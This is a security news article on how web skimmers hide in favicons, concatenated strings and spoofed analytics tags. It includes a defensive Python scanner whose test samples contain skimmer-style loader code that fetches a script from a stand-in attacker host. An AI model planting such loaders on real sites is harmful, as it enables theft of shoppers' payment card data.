Threat actors are using increasingly sophisticated techniques to hide the web skimming code they use to steal payment data. Microsoft researchers report that some of the recently uploaded skimming JavaScript and HTML files on VirusTotal have very low detection rates.

Stealthy skimmers

According to the researchers, three hiding methods have become noticeably more common: injecting scripts into image files, script spoofing, and string concatenation, all intended to keep the skimmers stealthy and undetected.
  • In the first case, malicious image files are uploaded to the target server disguised as favicons; their contents, however, include a PHP script carrying base64-encoded JavaScript.
  • String concatenation obfuscation hides the loader: an implant on the targeted site assembles the URL of an attacker-controlled domain from short string fragments at runtime and pulls the skimmer from there.
  • With script spoofing, the skimmers are disguised as Meta Pixel (formerly Facebook Pixel) or Google Analytics, two widely used visitor-tracking scripts present on a very large number of websites, so an extra tag of that name draws little attention.
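
The following Python scanner is an added example, not Microsoft's or Cyware's code, showing how a site owner could check for all three techniques in one pass. The favicon bytes and the HTML page it scans are constructed samples embedded in the script, and every hostname in them (cdn.example-attacker.invalid) is hypothetical; the set of legitimate tracker hosts is an assumption the reader should adjust for the vendors their site actually uses.

```python
"""Heuristic scanner for the three skimmer-hiding techniques listed above.

Added example, not Microsoft's or Cyware's code. The sample favicon and HTML
page are constructed here; the attacker hostnames are hypothetical.
"""
import base64
import re
from typing import List
from urllib.parse import urlparse

# Hosts from which the two imitated tracking scripts are legitimately served
# (assumption: adjust to the vendors your site actually uses).
LEGIT_TRACKER_HOSTS = {
    "www.google-analytics.com",
    "www.googletagmanager.com",
    "connect.facebook.net",
}

PHP_OPEN = re.compile(rb"<\?php", re.IGNORECASE)
B64_BLOB = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']([^\"']+)[\"']", re.IGNORECASE)
# Four or more short quoted fragments joined with '+': the concatenation pattern.
CONCAT_STRING = re.compile(r"(?:[\"'][^\"']{1,12}[\"']\s*\+\s*){3,}[\"'][^\"']{1,12}[\"']")
TRACKER_FILENAME = re.compile(r"(fbevents|analytics|gtag|gtm)\.js", re.IGNORECASE)


def scan_image(name: str, data: bytes) -> List[str]:
    """Technique 1: an image (e.g. a favicon) that carries PHP and base64-encoded JS."""
    findings = []
    if not PHP_OPEN.search(data):
        return findings
    findings.append(f"{name}: PHP open tag inside an image file")
    for blob in B64_BLOB.findall(data):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if b"document." in decoded or b"<script" in decoded.lower():
            findings.append(f"{name}: base64 blob decodes to JavaScript ({len(decoded)} bytes)")
    return findings


def scan_html(name: str, html: str) -> List[str]:
    """Techniques 2 and 3: concatenated loader strings and spoofed tracker scripts."""
    findings = []
    for m in CONCAT_STRING.finditer(html):
        # Rebuild the string the way the browser would, then judge the result.
        joined = "".join(re.findall(r"[\"']([^\"']*)[\"']", m.group(0)))
        if joined.startswith(("http", "//")) or "script" in joined.lower():
            findings.append(f"{name}: concatenated string builds {joined!r}")
    for src in SCRIPT_SRC.findall(html):
        if not TRACKER_FILENAME.search(src):
            continue
        host = urlparse(src if "://" in src else "https:" + src).hostname or ""
        if host not in LEGIT_TRACKER_HOSTS:
            where = host or "the site itself"
            findings.append(f"{name}: {src} uses a tracker file name but is served from {where}")
    return findings


# Constructed sample: JavaScript a skimmer might hide in a favicon. It fires only on
# checkout pages and pulls the real skimmer from a (hypothetical) attacker host.
HIDDEN_JS = (
    b"if(location.href.indexOf('checkout')>-1){"
    b"var s=document.createElement('script');"
    b"s.src='https://cdn.example-attacker.invalid/s.js';"
    b"document.head.appendChild(s);}"
)
SAMPLE_FAVICON = (
    b"\x89PNG\r\n\x1a\n"  # PNG magic so the file passes a naive type check
    + b"<?php echo base64_decode('" + base64.b64encode(HIDDEN_JS) + b"'); ?>"
)

# Constructed sample page: one real analytics tag, one spoofed Meta Pixel tag, and
# a loader whose URL is assembled by string concatenation.
SAMPLE_HTML = """<html><head>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script src="https://cdn.example-attacker.invalid/fbevents.js"></script>
<script>
var u = 'htt' + 'ps://cdn.' + 'example-at' + 'tacker.inva' + 'lid/s.js';
var s = document.createElement('script'); s.src = u; document.head.appendChild(s);
</script>
</head></html>
"""


def scan_site() -> List[str]:
    """Run both scanners over the constructed samples and return all findings."""
    return scan_image("favicon.ico", SAMPLE_FAVICON) + scan_html("index.html", SAMPLE_HTML)


if __name__ == "__main__":
    for finding in scan_site():
        print(finding)
```

The image check deliberately looks for a PHP open tag rather than trusting the file extension or magic bytes, because the whole point of the favicon trick is that the file looks like an image. The tracker check flags by origin, not by file name: a script called fbevents.js is only trusted when it comes from the vendor's own host, which is the one property the spoofing trick cannot fake.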

More information

Stealthy skimmers limit the effectiveness of threat detection products and raise the risk to shoppers. As observed in the ongoing campaign, the attackers obfuscate their code snippets, inject them into image files, and masquerade as legitimate web analytics scripts.

What to do?

Along with actively scanning for and detecting threats, website administrators should keep their CMS and plugins updated to the latest versions and review the third-party scripts loaded on checkout pages, confirming that any analytics or pixel tag is actually served from the vendor's own domain. Customers, meanwhile, are advised to use single-use virtual cards and strict payment limits to contain the damage if their card details are skimmed.

Cyware Publisher